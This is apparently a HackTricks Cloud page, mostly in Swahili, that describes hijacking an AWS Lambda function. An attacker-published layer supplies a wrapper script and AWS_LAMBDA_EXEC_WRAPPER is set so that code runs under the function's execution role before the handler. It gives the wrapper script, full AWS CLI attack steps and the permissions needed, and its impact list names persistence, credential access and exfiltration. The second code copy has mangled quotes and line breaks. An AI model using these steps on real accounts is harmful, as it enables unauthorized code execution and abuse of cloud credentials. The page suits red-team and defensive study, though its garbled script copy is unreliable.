AWS - Lambda Exec Wrapper Layer Hijack (Pre-Handler RCE)

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Angalia the subscription plans!

Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.

Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

Muhtasari

Tumia vibaya environment variable AWS_LAMBDA_EXEC_WRAPPER ili kutekeleza script ya wrapper inayodhibitiwa na mshambuliaji kabla runtime/handler inaanza. Toa wrapper kupitia Lambda Layer kwenye /opt/bin/htwrap, weka AWS_LAMBDA_EXEC_WRAPPER=/opt/bin/htwrap, kisha uitishe function. Wrapper inaendesha ndani ya mchakato wa runtime wa function, inarithi role ya utekelezaji ya function, na hatimaye hufanya exec ya runtime halisi ili handler ya asili bado ifanye kazi kawaida.

Warning

Mbinu hii inatoa utekelezaji wa code katika Lambda lengwa bila kubadilisha msimbo wa chanzo au role na bila kuhitaji iam:PassRole. Unahitaji tu uwezo wa kusasisha function configuration na kuchapisha/kuambatisha layer.

Idhini Zinazohitajika (mshambuliaji)

lambda:UpdateFunctionConfiguration
lambda:GetFunctionConfiguration
lambda:InvokeFunction (or trigger via existing event)
lambda:ListFunctions, lambda:ListLayers
lambda:PublishLayerVersion (same account) and optionally lambda:AddLayerVersionPermission if using a cross-account/public layer

Wrapper Script

Weka wrapper kwenye /opt/bin/htwrap ndani ya layer. Inaweza kuendesha mantiki ya kabla ya handler na lazima itamalize na exec "$@" ili kuunganisha na runtime halisi.

#!/bin/bash
set -euo pipefail
# Pre-handler actions (runs in runtime process context)
echo "[ht] exec-wrapper pre-exec: uid=$(id -u) gid=$(id -g) fn=$AWS_LAMBDA_FUNCTION_NAME region=$AWS_REGION"
python3 - <<'PY'
import boto3, json, os
try:
ident = boto3.client('sts').get_caller_identity()
print('[ht] sts identity:', json.dumps(ident))
except Exception as e:
print('[ht] sts error:', e)
PY
# Chain to the real runtime
exec "$@"

Hatua za Shambulio (CLI)

Chapisha layer, ambatisha kwa function lengwa, weka wrapper, itisha

```bash # Vars REGION=us-east-1 TARGET_FN=

1) Package wrapper at /opt/bin/htwrap

mkdir -p layer/bin cat > layer/bin/htwrap <<‘WRAP’ #!/bin/bash set -euo pipefail echo “[ht] exec-wrapper pre-exec: uid=$(id -u) gid=$(id -g) fn=$AWS_LAMBDA_FUNCTION_NAME region=$AWS_REGION” python3 - <<‘PY’ import boto3, json print(‘[ht] sts identity:’, import(‘json’).dumps(import(‘boto3’).client(‘sts’).get_caller_identity())) PY exec “$@” WRAP chmod +x layer/bin/htwrap (zip -qr htwrap-layer.zip layer)

2) Publish the layer

LAYER_ARN=$(aws lambda publish-layer-version
–layer-name ht-exec-wrapper
–zip-file fileb://htwrap-layer.zip
–compatible-runtimes python3.11 python3.10 python3.9 nodejs20.x nodejs18.x java21 java17 dotnet8
–query LayerVersionArn –output text –region “$REGION”)

echo “$LAYER_ARN”

3) Attach the layer and set AWS_LAMBDA_EXEC_WRAPPER

aws lambda update-function-configuration
–function-name “$TARGET_FN”
–layers “$LAYER_ARN”
–environment “Variables={AWS_LAMBDA_EXEC_WRAPPER=/opt/bin/htwrap}”
–region “$REGION”

Wait for update to finish

until [ “$(aws lambda get-function-configuration –function-name “$TARGET_FN” –query LastUpdateStatus –output text –region “$REGION”)“ = “Successful” ]; do sleep 2; done

4) Invoke and verify via CloudWatch Logs

aws lambda invoke –function-name “$TARGET_FN” /tmp/out.json –region “$REGION” >/dev/null aws logs filter-log-events –log-group-name “/aws/lambda/$TARGET_FN” –limit 50 –region “$REGION” –query ‘events[].message’ –output text

</details>

## Impact

- Utekelezaji wa msimbo kabla ya handler katika muktadha wa Lambda runtime kwa kutumia execution role ya function iliyopo.
- Hakuna mabadiliko yanayohitajika kwa code ya function au role; inafanya kazi katika managed runtimes za kawaida (Python, Node.js, Java, .NET).
- Inaruhusu persistence, credential access (mfano, STS), data exfiltration, na runtime tampering kabla handler inapoanza.

> [!TIP]
> Jifunze na ufanye mazoezi ya AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Jifunze na ufanye mazoezi ya GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Jifunze na ufanye mazoezi ya Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Saidia HackTricks</summary>
>
> - Angalia the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Jiunge na** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) au the [**telegram group**](https://t.me/peass) au **utufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Shiriki hacking tricks kwa kutuma PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>